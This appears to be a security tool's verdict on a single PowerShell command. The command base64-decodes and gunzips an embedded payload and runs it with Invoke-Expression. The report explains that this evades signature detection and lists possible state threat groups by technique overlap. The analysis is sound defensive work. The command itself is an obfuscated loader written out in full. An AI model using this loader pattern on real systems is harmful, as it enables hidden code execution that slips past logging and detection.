Malicious — high-confidence attack behavior
Multiple corroborating attack signals: Loader, Defense Evasion.
powershell -c "$b=[System.Convert]::FromBase64String('H4sIAAAAAAAA/6tWKkktLlGyUlIqS40vLUpVslIqLU4tykvMTQUA6nU3RDEAAAA=');$gz=New-Object IO.Compression.GZipStream((New-Object IO.MemoryStream(,$b)),[IO.Compression.CompressionMode]::Decompress);$sr=New-Object IO.StreamReader($gz);iex $sr.ReadToEnd()"
Uses PowerShell to decode a base64-encoded payload, decompress it as a gzip/deflate stream, and execute the decompressed text as PowerShell code via iex (Invoke-Expression).
The command leverages Powershell.exe, a Windows binary catalogued in LOLBAS as commonly abused for living-off-the-land attacks — known abuse categories: Execute. The payload uses base64-gzip (recovered) encoding — a common obfuscation technique to bypass signature-based detection and inline script-block logging.
The combination of high-confidence threat behavior, known-abused binary usage, and payload obfuscation strongly suggests this is an active attack payload. Treat this command as malicious and initiate containment procedures.
Powershell.exe is a task-based command-line shell built on .NET.
Russian GRU Unit 26165 threat group active since at least 2004. Primarily targets governments, militaries, and security organizations.
Russian SVR threat group responsible for the SolarWinds supply chain attack and numerous government breaches. Known for stealthy, long-dwell intrusions.
Russian GRU Unit 74455 group responsible for NotPetya, attacks on Ukrainian power grid, and Olympic Destroyer. Focuses on destructive operations.
Russian FSB-linked group known for sophisticated backdoors and hijacking other threat actors' infrastructure. Active since at least 2004.
North Korean state-sponsored group linked to the $81M Bangladesh Bank heist, WannaCry ransomware, and Sony Pictures breach. The most prolific nation-state financial threat actor.
Attribution based on MITRE ATT&CK technique overlap. Confidence reflects TTP match depth — not a definitive attribution.